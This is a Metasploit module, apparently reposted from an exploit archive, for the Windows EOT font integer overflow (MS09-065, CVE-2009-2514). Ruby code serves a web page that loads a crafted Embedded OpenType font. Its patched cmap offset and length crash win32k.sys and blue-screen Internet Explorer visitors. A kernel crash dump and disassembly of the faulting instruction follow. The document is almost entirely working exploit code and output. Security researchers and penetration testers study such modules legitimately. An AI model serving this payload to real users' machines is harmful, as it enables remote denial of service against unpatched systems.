Microsoft Windows EOT Font Table Directory Integer Overflow

`##  
# $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Windows EOT Font Table Directory Integer Overflow',  
'Description' => %q{  
This module exploits an integer overflow flaw in the Microsoft Windows Embedded  
OpenType font parsing code located in win32k.sys. Since the kernel itself parses  
embedded web fonts, it is possible to trigger a BSoD from a normal web page when  
viewed with Internet Explorer.  
},  
'License' => MSF_LICENSE,  
'Author' => 'hdm',  
'Version' => '$Revision: 7470 $',  
'References' =>  
[  
[ 'CVE', '2009-2514' ],  
[ 'MSB', 'MS09-065' ],  
[ 'OSVDB', '59869']  
],  
'DisclosureDate' => 'Nov 10 2009'  
))  
register_options([  
OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]),  
], self.class)  
  
end  
  
def run  
exploit  
end  
  
def on_request_uri(cli, request)  
@tag ||= Rex::Text.rand_text_alpha(8)  
@eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))  
  
if(request.uri =~ /#{@tag}$/)  
content = @eot.dup  
  
# Only this table entry seems to trigger the bug  
cidx = content.index('cmap')  
  
# Use an offset and a length that overflow when combined  
coff = 0xb0000000  
clen = (0xfffffffe - coff + 0xcc)  
  
# Patch in the modified offset and length values  
content[cidx + 8, 8] = [ coff, clen ].pack("N*")  
  
# Send the font on its merry way  
print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })  
else  
var_title = Rex::Text.rand_text_alpha(6 + rand(32))  
var_body = Rex::Text.rand_text_alpha(64 + rand(32))  
var_font = Rex::Text.rand_text_alpha(2 + rand(6))  
var_face = Rex::Text.rand_text_alpha(2 + rand(32))  
  
content = %Q|<html><head><title>#{var_title}</title><style type="text/css">  
@font-face{ font-family: '#{var_face}'; src: url('#{get_resource}/#{var_font}#{@tag}'); }  
body {  
font-family: '#{var_face}';  
}  
</style></head><body> #{var_body} </body></html>|  
  
print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, content, { 'Content-Type' => 'text/html' })  
end  
end  
end  
  
=begin  
  
#  
# Crash dump information  
#  
  
READ_ADDRESS: b0f70072  
  
FAULTING_IP:  
win32k!bComputeIDs+28  
bf87c9df 8a6702 mov ah,byte ptr [edi+2]  
  
MM_INTERNAL_CODE: 0  
  
IMAGE_NAME: win32k.sys  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 45f013f6  
  
MODULE_NAME: win32k  
  
FAULTING_MODULE: bf800000 win32k  
  
DEFAULT_BUCKET_ID: DRIVER_FAULT  
  
BUGCHECK_STR: 0x50  
  
PROCESS_NAME: csrss.exe  
  
TRAP_FRAME: b22192e8 -- (.trap 0xffffffffb22192e8)  
ErrCode = 00000000  
eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070  
eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0 nv up ei pl nz na pe nc  
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206  
win32k!bComputeIDs+0x28:  
bf87c9df 8a6702 mov ah,byte ptr [edi+2] ds:0023:b0f70072=??  
Resetting default scope  
  
LAST_CONTROL_TRANSFER: from 804f79d7 to 80526fc8  
  
STACK_TEXT:  
b2218e24 804f79d7 00000003 b0f70072 00000000 nt!RtlpBreakWithStatusInstruction  
b2218e70 804f85c4 00000003 00000000 c0587b80 nt!KiBugCheckDebugBreak+0x19  
b2219250 804f8aef 00000050 b0f70072 00000000 nt!KeBugCheck2+0x574  
b2219270 8051c0d3 00000050 b0f70072 00000000 nt!KeBugCheckEx+0x1b  
b22192d0 8053f90c 00000000 b0f70072 00000000 nt!MmAccessFault+0x8e7  
b22192d0 bf87c9df 00000000 b0f70072 00000000 nt!KiTrap0E+0xcc  
b2219374 bf87a391 00f70010 b22198d8 b2219a76 win32k!bComputeIDs+0x28  
b22193a8 bf87a02b 00f70010 00004d18 00000000 win32k!bVerifyTTF+0xe1  
b2219a68 bf879f0e e234b668 00f70010 00004d18 win32k!bLoadTTF+0x7c  
b2219af0 bf879e48 e234b668 00f70010 00004d18 win32k!bLoadFontFile+0x228  
b2219b40 bf879911 00000001 e234b660 b2219bf0 win32k!ttfdSemLoadFontFile+0x4c  
b2219b70 bf87989f 00000001 e234b660 b2219bf0 win32k!PDEVOBJ::LoadFontFile+0x3a  
b2219ba8 bf96370c 00000000 00000000 e234b660 win32k!vLoadFontFileView+0x12b  
b2219c5c bf93eda9 e234b660 00000000 00000000 win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a  
b2219cb4 bf9488e4 00f70000 e10ff0b0 00000000 win32k!GreAddFontMemResourceEx+0x76  
b2219d48 8053ca28 0297cc48 00004d18 00000000 win32k!NtGdiAddFontMemResourceEx+0xb0  
b2219d48 7c90eb94 0297cc48 00004d18 00000000 nt!KiFastCallEntry+0xf8  
0172f6dc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet  
  
win32k!bComputeIDs:  
bf87c9b7 8bff mov edi,edi  
bf87c9b9 55 push ebp  
bf87c9ba 8bec mov ebp,esp  
bf87c9bc 83ec10 sub esp,10h  
bf87c9bf 8b450c mov eax,dword ptr [ebp+0Ch]  
bf87c9c2 8b4804 mov ecx,dword ptr [eax+4]  
bf87c9c5 53 push ebx  
bf87c9c6 57 push edi  
bf87c9c7 8b38 mov edi,dword ptr [eax]  
bf87c9c9 037d08 add edi,dword ptr [ebp+8]  
bf87c9cc 33db xor ebx,ebx  
bf87c9ce 33c0 xor eax,eax  
bf87c9d0 83f904 cmp ecx,4  
bf87c9d3 895df8 mov dword ptr [ebp-8],ebx  
bf87c9d6 894dfc mov dword ptr [ebp-4],ecx  
bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae)  
bf87c9df 8a6702 mov ah,byte ptr [edi+2] <--- the crash above  
  
=end  
  
`